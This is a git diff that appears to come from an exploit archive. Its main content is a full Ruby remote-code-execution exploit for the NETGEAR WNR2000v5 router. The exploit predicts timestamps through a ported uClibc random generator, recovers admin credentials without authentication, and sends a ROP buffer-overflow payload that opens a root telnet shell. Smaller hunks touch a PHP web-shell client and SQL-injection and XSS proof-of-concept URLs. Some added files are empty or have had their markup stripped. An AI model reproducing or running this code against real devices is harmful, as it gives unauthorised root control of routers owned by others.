a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb new file mode 100755 index 000000000..f61f500cb --- /dev/null +++ b/platforms/cgi/remote/40949.rb @@ -0,0 +1,428 @@ +# +# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb +# +# Remote code execution in NETGEAR WNR2000v5 +# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security +# Released on 20/12/2016 +# +# NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot. +# A more reliable Metasploit module will be released soon. +# +# +# TODO: +# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password) +# - finish telnetenable (get mac and send packet) +# - finish timestamp regex (?) +# - randomise payload + +require 'net/http' +require 'uri' +require 'time' + +#################### +# ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c +# and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c + +TYPE_3 = 3 +BREAK_3 = 128 +DEG_3 = 31 +SEP_3 = 3 + +@randtbl = +[ + # we omit TYPE_3 from here, not needed + -1726662223, 379960547, 1735697613, 1040273694, 1313901226, + 1627687941, -179304937, -2073333483, 1780058412, -1989503057, + -615974602, 344556628, 939512070, -1249116260, 1507946756, + -812545463, 154635395, 1388815473, -1926676823, 525320961, + -1009028674, 968117788, -123449607, 1284210865, 435012392, + -2017506339, -911064859, -370259173, 1132637927, 1398500161, + -205601318, +] + +@unsafe_state = { + "fptr" => SEP_3, + "rptr" => 0, + "state" => 0, + "rand_type" => TYPE_3, + "rand_deg" => DEG_3, + "rand_sep" => SEP_3, + "end_ptr" => DEG_3 +} + +# Emulate the behaviour of C's srand +def srandom_r (seed) + state = @randtbl + if seed == 0 + seed = 1 + end + state[0] = seed + + dst = 0 + word = seed + kc = DEG_3 + for i in 1..(kc-1) + hi = word / 127773 + lo = word % 127773 + word = 16807 * lo - 2836 * hi + if (word < 0) + word += 2147483647 + end + dst += 1 + state[dst] = word + end + + @unsafe_state['fptr'] = @unsafe_state['rand_sep'] + @unsafe_state['rptr'] = 0 + + kc *= 10 + kc -= 1 + while (kc >= 0) + random_r + kc -= 1 + end +end + +# Emulate the behaviour of C's rand +def random_r + buf = @unsafe_state + state = buf['state'] + + fptr = buf['fptr'] + rptr = buf['rptr'] + end_ptr = buf['end_ptr'] + val = @randtbl[fptr] += @randtbl[rptr] + + result = (val >> 1) & 0x7fffffff + fptr += 1 + if (fptr >= end_ptr) + fptr = state + rptr += 1 + else + rptr += 1 + if (rptr >= end_ptr) + rptr = state + end + end + buf['fptr'] = fptr + buf['rptr'] = rptr + + result +end +##################### + +##################### +# Ruby code ported from https://github.com/insanid/netgear-telenetenable +# +def telnetenable (mac, username, password) + mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00") + username_pad = username.ljust(0x10, "\x00") + password_pad = password.ljust(0x21, "\x00") + cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00") + + md5 = Digest::MD5.new + md5.update(cleartext) + payload = (md5.digest + cleartext).ljust(0x80, "\x00").unpack('N*').pack('V*') + + secret_key = "AMBIT_TELNET_ENABLE+" + password + cipher = OpenSSL::Cipher::Cipher.new("bf-ecb").send :encrypt + cipher.key_len = secret_key.length + cipher.key = secret_key + cipher.padding = 0 + binary_data = (cipher.update(payload) << cipher.final) + + binary_data.unpack('N*').pack('V*') +end +##################### + +# Do some crazyness to force Ruby to cast to a single-precision float and +# back to an integer. +# This emulates the behaviour of the soft-fp library and the float cast +# which is done at the end of Netgear's timestamp generator. +def ieee754_round (number) + [number].pack('f').unpack('f*')[0].to_i +end + + +# This is the actual algorithm used in the get_timestamp function in +# the Netgear firmware. +def get_timestamp(time) + srandom_r time + t0 = random_r + t1 = 0x17dc65df; + hi = (t0 * t1) >> 32; + t2 = t0 >> 31; + t3 = hi >> 23; + t3 = t3 - t2; + t4 = t3 * 0x55d4a80; + t0 = t0 - t4; + t0 = t0 + 0x989680; + + ieee754_round(t0) +end + +# Default credentials for the router +USERNAME = "admin" +PASSWORD = "password" + +def get_request(uri_str) + uri = URI.parse(uri_str) + http = Net::HTTP.new(uri.host, uri.port) + #http.set_debug_output($stdout) + request.basic_auth(USERNAME, PASSWORD) + request = Net::HTTP::Get.new(uri.request_uri) + http.request(request) +end + +def post_request(uri_str, body) + uri = URI.parse(uri_str) + header = { 'Content-Type' => 'application/x-www-form-urlencoded' } + http = Net::HTTP.new(uri.host, uri.port) + #http.set_debug_output($stdout) + request.basic_auth(USERNAME, PASSWORD) + request = Net::HTTP::Post.new(uri.request_uri, header) + request.body = body + http.request(request) +end + +def check + response = get_request("http://#{@target}/") + auth = response['WWW-Authenticate'] + if auth != nil + if auth =~ /WNR2000v5/ + puts "[+] Router is vulnerable and exploitable (WNR2000v5)." + return + elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ + puts "[-] Router is vulnerable, but this exploit might not work (WNR2000v3 or v4)." + return + end + end + puts "Router is not vulnerable." +end + +def get_password + response = get_request("http://#{@target}/BRS_netgear_success.html") + if response.body =~ /var sn="([\w]*)";/ + serial = $1 + else + puts "[-]Failed to obtain serial number, bailing out..." + exit(1) + end + + # 1: send serial number + response = post_request("http://#{@target}/apply_noauth.cgi?/unauth.cgi", "submit_flag=match_sn&serial_num=#{serial}&continue=+Continue+") + + # 2: send answer to secret questions + response = post_request("http://#{@target}/apply_noauth.cgi?/securityquestions.cgi", \ + "submit_flag=security_question&answer1=secretanswer1&answer2=secretanswer2&continue=+Continue+") + + # 3: PROFIT!!! + response = get_request("http://#{@target}/passwordrecovered.cgi") + + if response.body =~ /Admin Password: (.*)<\/TD>/ + password = $1 + else + puts "[-] Failed to obtain admin password, bailing out..." + exit(1) + end + + if response.body =~ /Admin Username: (.*)<\/TD>/ + username = $1 + else + puts "[-] Failed to obtain admin username, bailing out..." + exit(1) + end + + puts "[+] Success! Got admin username #{username} and password #{password}" + return [username, password] +end + +def get_current_time + response = get_request("http://#{@target}/") + + date = response['Date'] + Time.parse(date).strftime('%s').to_i +end + +def get_auth_timestamp(mode) + if mode == "bof" + uri_str = "lang_check.html" + else + uri_str = "PWD_password.htm" + end + response = get_request(uri_str) + if response.code == 401 + # try again, might fail the first time + response = get_request(uri_str) + if response.code == 200 + if response.body =~ /timestamp=([0-9]{8})/ + $1.to_i + end + end + end +end + +def got_shell + puts "[+] Success, shell incoming!" + exec("telnet #{@target.split(':')[0]}") +end + +if ARGV.length < 2 + puts "Usage: ./netgearPwn.rb [noreboot]" + puts "\tcheck: see if the target is vulnerable" + puts "\tbof: run buffer overflow exploit on the target" + puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!" + puts "\tnoreboot: optional parameter - don't force a reboot on the target" + exit(1) +end + +@target = ARGV[0] +mode = ARGV[1] + +if ARGV.length == 3 && ARGV[2] == "noreboot" + reboot = false +else + reboot = true +end + +# Maximum time differential to try +# Look 5000 seconds back for the timestamp with reboot +# 500000 with no reboot +if reboot + TIME_OFFSET = 5000 +else + TIME_OFFSET = 500000 +end + +# Increase this if you're sure the device is vulnerable and you're not getting a shell +TIME_SURPLUS = 200 + +if mode == "check" + check + exit(0) +end + +if mode == "bof" + def uri_encode (str) + "%" + str.scan(/.{2}|.+/).join("%") + end + + def calc_address (libc_base, offset) + addr = (libc_base + offset).to_s(16) + uri_encode(addr) + end + + system_offset = 0x547D0 + gadget = 0x2462C + libc_base = 0x2ab24000 + + payload = 'a' * 36 + # filler_1 + calc_address(libc_base, system_offset) + # s0 + '1111' + # s1 + '2222' + # s2 + '3333' + # s3 + calc_address(libc_base, gadget) + # gadget + 'b' * 0x40 + # filler_2 + "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload +end + +# 0: try to see if the default admin username and password are set +timestamp = get_auth_timestamp(mode) + +# 1: reboot the router to get it to generate new timestamps +if reboot and timestamp == nil + response = post_request("http://#{@target}/apply_noauth.cgi?/reboot_waiting.htm", "submit_flag=reboot&yes=Yes") + if response.code == "200" + puts "[+] Successfully rebooted the router. Now wait two minutes for the router to restart..." + sleep 120 + puts "[*] Connect to the WLAN or Ethernet now. You have one minute to comply." + sleep 60 + else + puts "[-] Failed to reboot the router. Bailing out." + exit(-1) + end + + puts "[*] Proceeding..." +end + +# 2: get the current date from the router and parse it, but only if we are not authenticated... +if timestamp == nil + end_time = get_current_time + if end_time <= TIME_OFFSET + start_time = 0 + else + start_time = end_time - TIME_OFFSET + end + end_time += TIME_SURPLUS + + if end_time < (TIME_SURPLUS * 7.5).to_i + end_time = (TIME_SURPLUS * 7.5).to_i + end + + puts "[+] Got time #{end_time} from router, starting exploitation attempt." + puts "[*] Be patient, this might take up a long time (typically a few minutes, but maybe an hour or more)." +end + +if mode == "bof" + uri_str = "http://#{@target}/apply_noauth.cgi?/lang_check.html%20timestamp=" + body = "submit_flag=select_language&hidden_lang_avi=#{payload}" +else + uri_str = "http://#{@target}/apply_noauth.cgi?/PWD_password.htm%20timestamp=" + body = "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=secretanswer1&question2=2&answer2=secretanswer2" +end + +# 3: work back from the current router time minus TIME_OFFSET +while true + for time in end_time.downto(start_time) + begin + if timestamp == nil + response = post_request(uri_str + get_timestamp(time).to_s, body) + else + response = post_request(uri_str + timestamp.to_s, body) + end + if response.code == "200" + # this only occurs in the telnet case + credentials = get_password + #telnetenable(mac, credentials[0], credentials[1]) + #sleep 5 + #got_shell + puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}" + puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" + exit(0) + end + rescue EOFError + if reboot + sleep 0.2 + else + # with no reboot we give the router more time to breathe + sleep 0.5 + end + begin + s = TCPSocket.new(@target.split(':')[0], 23) + s.close + got_shell + rescue Errno::ECONNREFUSED + if timestamp != nil + # this is the case where we can get an authenticated timestamp but we could not execute code + # IT SHOULD NEVER HAPPEN + # But scream and continue just in case, it means there is a bug + puts "[-] Something went wrong. We can obtain the timestamp with the default credentials, but we could not execute code." + puts "[*] Let's try again..." + timestamp = get_auth_timestamp + end + next + end + rescue Net::ReadTimeout + # for bof case, we land here + got_shell + end + end + if timestamp == nil + start_time = end_time - (TIME_SURPLUS * 5) + end_time = end_time + (TIME_SURPLUS * 5) + puts "[*] Going for another round, increasing end time to #{end_time} and start time to #{start_time}" + end +end + +# If we get here then the exploit failed +puts "[-] Exploit finished. Failed to get a shell!" \ No newline at end of file diff --git a/platforms/cgi/webapps/26461.txt b/platforms/cgi/webapps/26461.txt index e107ae1d3..f74ed2219 100755 --- a/platforms/cgi/webapps/26461.txt +++ b/platforms/cgi/webapps/26461.txt @@ -14,7 +14,7 @@ document.forms[0].submit();
- +
diff --git a/platforms/cgi/webapps/26462.txt b/platforms/cgi/webapps/26462.txt index 5bb25c780..593c00d8c 100755 --- a/platforms/cgi/webapps/26462.txt +++ b/platforms/cgi/webapps/26462.txt @@ -5,7 +5,7 @@ Simple PHP Blog is prone to multiple input validation vulnerabilities. These iss An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
- +
diff --git a/platforms/php/webapps/6311.php b/platforms/php/webapps/6311.php index 90bb5700f..2770e88d8 100755 --- a/platforms/php/webapps/6311.php +++ b/platforms/php/webapps/6311.php @@ -27,7 +27,7 @@ extract($_POST);extract($_GET); print "
URL:
";
 if (strlen($eval)>3){
    $eval=stripslashes($eval);
-   print "\nEnter PHP Command:\n";
    print "
";
    $res=curl("$url/images/emoticons/sphp.php","z=$eval");
    $res=strstr($res,"GIF89a");
@@ -76,7 +76,7 @@ if (strlen($url)>10)
   print "\n
Trying to Logout...";flush();
   $res=curl($url."/logout.php","");
   if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n
Error To Logout
\n\n\n$res");
-  print "\nEnter PHP Command:\n";
 }
 print "";
 ?>
diff --git a/platforms/php/webapps/6422.txt b/platforms/php/webapps/6422.txt
index 1ae9270e3..ec54d2064 100755
--- a/platforms/php/webapps/6422.txt
+++ b/platforms/php/webapps/6422.txt
@@ -45,12 +45,12 @@
   
      
      POC:  
-	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
+	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
 	http://www.site.com/search_results.php?query=[XSS] 
 
      
      Live Demo: 
-	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
+	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
 	http://www.phpvid.com/search_results.php?query=
 
 
diff --git a/platforms/php/webapps/8713.txt b/platforms/php/webapps/8713.txt
index 59b5a1c57..96f46098f 100755
--- a/platforms/php/webapps/8713.txt
+++ b/platforms/php/webapps/8713.txt
@@ -204,7 +204,7 @@ You must know that all _GET _POST _REQUEST variables are sanizated in init.inc.p
 File: /include/init.inc.php
 
 	// Do some cleanup in GET, POST and cookie data and un-register global vars
-	$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => '''); 
+	$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => '''); 
 
 	...
 	$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
diff --git a/platforms/windows/dos/40947.html b/platforms/windows/dos/40947.html
new file mode 100755
index 000000000..040e4c3f8
--- /dev/null
+++ b/platforms/windows/dos/40947.html
@@ -0,0 +1,36 @@
+
+
+
diff --git a/platforms/windows/dos/40948.html b/platforms/windows/dos/40948.html
new file mode 100755
index 000000000..67d21d03f
--- /dev/null
+++ b/platforms/windows/dos/40948.html
@@ -0,0 +1,64 @@
+
+
+